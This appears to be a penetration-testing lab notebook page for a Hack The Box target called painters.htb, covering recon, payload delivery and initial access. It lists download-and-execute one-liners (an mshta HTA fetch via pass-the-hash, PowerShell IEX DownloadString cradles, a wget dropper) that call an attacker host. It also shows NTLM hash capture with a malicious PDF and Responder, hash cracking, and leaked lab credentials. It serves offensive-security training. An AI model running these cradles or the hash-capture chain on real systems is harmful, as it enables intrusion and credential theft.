External Recon

nmap Results

Following information were found on the website’s home page
info@painters.htb

On the vacancies tab, we found some job postings

User Ralph Davies

Resource Development

1. With CrackMapExec (CME)

nxc smb <TargetIP> -u 'Administrator' -H <NTLM Hash> --local-auth -x "C:\\Windows\\System32\\mshta.exe http://10.10.14.7/sharp_new.hta"

2. Using mshta

mshta.exe http://10.10.14.7/sharp_new.hta

3. Using Powershell (various encodings/escaping)

powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.7/sharp.ps1')"

(New-Object System.Net.WebClient).DownloadString('http://10.10.14.7/sharp.ps1') | IEX

powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.7/sharp.ps1%27)%22

4. Linux Dropper (Wget Method)

wget http://10.10.14.7/bad.sh -O /tmp/bad.sh && sh /tmp/bad.sh

xor_shellcode

PDF upload

The site is having a pdf upload functionality which allows a user to apply for the job vacancies. The default creds for admin admin doesn’t works on the /views/admin.

Responder and badpdf

 
sudo su

cd /opt/active_directory/Responder

source venv-responder/bin/activate

sudo systemctl stop smbd
sudo systemctl disable smbd

/Responder.py -I tun0

badpdf

 
git clone https://github.com/deepzec/Bad-Pdf.git
 
sudo pyhton2 badpdf.py

I have changed the exploit so that It doesn’t check or run responder. We have to start it manually.

Getting the NTLM Hash

[SMB] NTLMv2-SSP Client   : 10.10.110.35
[SMB] NTLMv2-SSP Username : PAINTERS\riley
[SMB] NTLMv2-SSP Hash     : riley::PAINTERS:9a3135c3984284ec:111082F06F8082266F45F01F7614FFF0:010100000000000000B9CFBF18A5D90192A276E28C2C84D300000000020008004C0033005900460001001E00570049004E002D00510059003200500039004E003000410053005900320004003400570049004E002D00510059003200500039004E00300041005300590032002E004C003300590046002E004C004F00430041004C00030014004C003300590046002E004C004F00430041004C00050014004C003300590046002E004C004F00430041004C000700080000B9CFBF18A5D90106000400020000000800300030000000000000000000000000200000A1FDFEAEA370D6267D964FC38D09001A74328017F9668D66310830AB3F16BEBB0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000

Cracking the Hash

 
hashcat hash.txt /usr/share/wordlists/rockyou.txt

Password for user riley

riley hash

P@ssw0rd

Initial Foothold

ssh riley@10.10.110.35

Enumeration

 
define("DB_HOST", "localhost");
define("DB_NAME", "painter");
define("DB_CHARSET", "utf8");
define("DB_USER", "riley");
define("DB_PASSWORD", "PainterDBPassword2022");
 
 
 
[+] Users with console
 
blake:x:1002:1002:Blake Morris,,,:/home/blake:/bin/bash
daniel:x:1001:1001:Daniel Morris,,,:/home/daniel:/bin/bash
matt:x:1000:1000:Matt Fisher:/home/matt:/bin/bash
riley:x:1003:1003:Riley Smart,,,:/home/riley:/bin/bash
root:x:0:0:root:/root:/bin/bash

Malleum Knowledge Base

Explorer

M1_10.10.110.35

External Recon

Resource Development

1. With CrackMapExec (CME)

2. Using mshta

3. Using Powershell (various encodings/escaping)

4. Linux Dropper (Wget Method)

PDF upload

Responder and badpdf

badpdf

Getting the NTLM Hash

Cracking the Hash

Password for user riley

Initial Foothold

Enumeration

Graph View

Table of Contents

Backlinks

Malleum Knowledge Base

Explorer

M1_10.10.110.35

External Recon

Resource Development

1. With CrackMapExec (CME)

2. Using mshta

3. Using Powershell (various encodings/escaping)

4. Linux Dropper (Wget Method)

PDF upload

Responder and badpdf

badpdf

Getting the NTLM Hash

Cracking the Hash

Password for user riley

Initial Foothold

Login to ssh with user riley

Enumeration

Graph View

Table of Contents

Backlinks